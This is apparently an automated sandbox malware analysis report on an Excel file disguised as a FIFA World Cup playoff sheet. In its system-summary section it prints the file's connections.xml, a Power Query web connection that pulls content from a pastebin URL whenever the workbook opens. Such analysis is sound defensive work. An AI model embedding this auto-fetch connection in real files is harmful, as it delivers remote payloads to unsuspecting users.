Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report FIFA World Cup 2018 - Play offs.xlsx

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:898172
Start date:28.06.2019
Start time:14:00:06
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 33s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:FIFA World Cup 2018 - Play offs.xlsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2013 Professional, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal48.troj.winXLSX@1/8@1/1
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 23.10.249.18, 23.10.249.25, 93.184.221.240, 13.107.4.50, 104.41.216.206, 65.52.199.96, 65.52.196.196, 205.185.216.10, 205.185.216.42, 104.94.183.45, 23.54.115.197
  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, a1363.dscg.akamai.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, e3673.dscg.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, crl.www.ms.akadns.net, wu.azureedge.net, m-vnext.sqlazurelabs.com, e11290.dspg.akamaiedge.net, au.au-msedge.net, go.microsoft.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, go.microsoft.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, au.c-0001.c-msedge.net, download.microsoft.com, crl.microsoft.com, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold480 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsExploitation for Client Execution4Modify Existing Service2New Service1Web Service1Credential DumpingProcess Discovery1Remote File Copy2Data from Local SystemData Encrypted1Web Service1
Replication Through Removable MediaService ExecutionNew Service1Accessibility FeaturesBinary PaddingNetwork SniffingFile and Directory Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionRootkitInput CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or InformationCredentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol13
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferRemote File Copy2

Signature Overview

Click to jump to signature section


Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)Show sources
Source: excel.exeMemory has grown: Private usage: 3MB later: 100MB
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: pastebin.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.94:49196 -> 104.20.208.21:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.94:49196 -> 104.20.208.21:443

Networking:

barindex
Connects to a pastebin service (likely for C&C)Show sources
Source: unknownDNS query: name: pastebin.com
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 104.20.208.21 104.20.208.21
Source: Joe Sandbox ViewIP Address: 104.20.208.21 104.20.208.21
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /raw/PX31NCah HTTP/1.1Accept: text/html, text/plain, text/xmlUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateHost: pastebin.comConnection: Keep-AliveCookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EAYYUSJB\PX31NCah[1].txtJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /raw/PX31NCah HTTP/1.1Accept: text/html, text/plain, text/xmlUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateHost: pastebin.comConnection: Keep-AliveCookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: pastebin.com
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443

System Summary:

barindex
Document uses Power Query (might be used to download and execute payloads)Show sources
Source: connections.xmlBinary string: <connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="xr16" xmlns:xr16="http://schemas.microsoft.com/office/spreadsheetml/2017/revision16"><connection id="1" xr16:uid="{7AD9A800-E2BC-4BB2-97BE-52BFEF17D112}" name="Connection" type="4" refreshedVersion="6" background="1" refreshOnLoad="1"><webPr sourceData="1" parsePre="1" consecutive="1" xl2000="1" url="https://pastebin.com/raw/PX31NCah"/></connection></connections>
Classification labelShow sources
Source: classification engineClassification label: mal48.troj.winXLSX@1/8@1/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEFile created: C:\Users\user\AppData\Local\microsoft\office\OTeleData_2056_1.etlJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR6801.tmpJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f0b6809bb6f55335a810ec4f96f2cbcf\mscorlib.ni.dllJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXESection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\7a02999e99bdbc5c868eb509a3a2a269\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Document is a ZIP file with path names indicative of goodwareShow sources
Source: FIFA World Cup 2018 - Play offs.xlsxInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: FIFA World Cup 2018 - Play offs.xlsxInitial sample: OLE zip file path = xl/connections.xml
Source: FIFA World Cup 2018 - Play offs.xlsxInitial sample: OLE zip file path = xl/queryTables/queryTable1.xml
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dllJump to behavior

Boot Survival:

barindex
Creates or modifies windows servicesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXERegistry key created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\15.0\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\ASP.NET_4.0.30319\NamesJump to behavior
Modifies existing windows servicesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXERegistry key value modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\15.0\ClickToRun\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\ASP.NET_4.0.30319\NamesJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEThread delayed: delay time: 922337203685477Jump to behavior
Queries a list of all running processesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Enables debug privilegesShow sources
Source: C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXEProcess token adjusted: DebugJump to behavior
Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 898172 Sample: FIFA World Cup 2018 - Play offs.xlsx Startdate: 28/06/2019 Architecture: WINDOWS Score: 48 10 Document uses Power Query (might be used to download and execute payloads) 2->10 12 Connects to a pastebin service (likely for C&C) 2->12 5 EXCEL.EXE 451 51 2->5         started        process3 dnsIp4 8 pastebin.com 104.20.208.21, 443, 49196, 49197 unknown United States 5->8

Simulations

Behavior and APIs

TimeTypeDescription
14:00:28API Interceptor88x Sleep call for process: EXCEL.EXE modified

Antivirus and Machine Learning Detection

Initial Sample

SourceDetectionScannerLabelLink
FIFA World Cup 2018 - Play offs.xlsx2%virustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

